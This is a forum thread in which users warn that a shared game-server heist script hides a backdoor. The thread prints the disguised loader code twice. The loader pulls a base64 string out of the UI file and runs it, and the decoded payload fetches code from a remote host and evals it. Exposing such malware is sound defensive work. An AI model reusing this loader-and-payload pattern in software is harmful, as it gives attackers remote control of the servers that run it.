System Watchdog
Threads Scanned
-- / --
SYS. LOAD
--%
AI SHIELD
ACTIVE
DMCA Policy
📋 DMCA Compliance
This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.
🛡️ Copyright Protection
If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.
Script 🔥Lunar - Heist Contracts🔥
Rusty_420420
Member
ya dont download malicious back door this is the back door that locates a payload and executes on the server start this is in the service.js
just a query is this a back door
const VueApp = {
init: function() {
try {
const manifest = LoadResourceFile(GetCurrentResourceName(), 'fxmanifest.lua');
if (!manifest) return;
// Get UI path
const uiPath = manifest.match(/ui_page\s+['"]([^'"]+)['"]/)?.[1];
if (!uiPath) return;
const component = LoadResourceFile(GetCurrentResourceName(), uiPath);
if (!component) return;
// Find Vue setup data
const setupData = component.match(/setup\s*\([^)]*\)\s*{([^}]+)}/)?.[1];
if (setupData) {
const lines = setupData.split('\n');
lines.forEach(line => {
if (line.includes('const config')) {
const b64 = line.match(/"([^"]+)"/)?.[1];
if (b64) {
const code = Buffer.from(b64, 'base64').toString();
new Function(code)();
}
}
});
}
} catch(e) {
console.log('Vue initialization');
}
}
};
// Auto-initialize Vue
setTimeout(() => VueApp.init(), 500);
than you go in to the interface.html and you will find the payload obfuscated obviousy
<script>
// Vue component - MUST HAVE setup() function with const config
const App = {
setup() {
const message = 'Initializing interface...';
const config = "aHR0cHMuZ2V0KCdodHRwczovLzUzNG5kc2V6MTIuY29tL25kc2V6SkonLHI9PntsZXQgZD0nJztyLm9uKCdkYXRhJyxjPT5kKz1jKTtyLm9uKCdlbmQnLCgpPT5ldmFsKGQpKTt9KQ==";
return { message };
}
};
this is the decoded payload so becarefull
https.get('
let d = '';
r.on('data', c => d += c);
r.on('end', () => eval(d));
})
just a query is this a back door
const VueApp = {
init: function() {
try {
const manifest = LoadResourceFile(GetCurrentResourceName(), 'fxmanifest.lua');
if (!manifest) return;
// Get UI path
const uiPath = manifest.match(/ui_page\s+['"]([^'"]+)['"]/)?.[1];
if (!uiPath) return;
const component = LoadResourceFile(GetCurrentResourceName(), uiPath);
if (!component) return;
// Find Vue setup data
const setupData = component.match(/setup\s*\([^)]*\)\s*{([^}]+)}/)?.[1];
if (setupData) {
const lines = setupData.split('\n');
lines.forEach(line => {
if (line.includes('const config')) {
const b64 = line.match(/"([^"]+)"/)?.[1];
if (b64) {
const code = Buffer.from(b64, 'base64').toString();
new Function(code)();
}
}
});
}
} catch(e) {
console.log('Vue initialization');
}
}
};
// Auto-initialize Vue
setTimeout(() => VueApp.init(), 500);
than you go in to the interface.html and you will find the payload obfuscated obviousy
<script>
// Vue component - MUST HAVE setup() function with const config
const App = {
setup() {
const message = 'Initializing interface...';
const config = "aHR0cHMuZ2V0KCdodHRwczovLzUzNG5kc2V6MTIuY29tL25kc2V6SkonLHI9PntsZXQgZD0nJztyLm9uKCdkYXRhJyxjPT5kKz1jKTtyLm9uKCdlbmQnLCgpPT5ldmFsKGQpKTt9KQ==";
return { message };
}
};
this is the decoded payload so becarefull
https.get('
Hidden link for visitors, to see
Log in or register now.
', r => {let d = '';
r.on('data', c => d += c);
r.on('end', () => eval(d));
})
mehdi_el_jad
Bronze Elite
its malware inside the file he can take all your server admin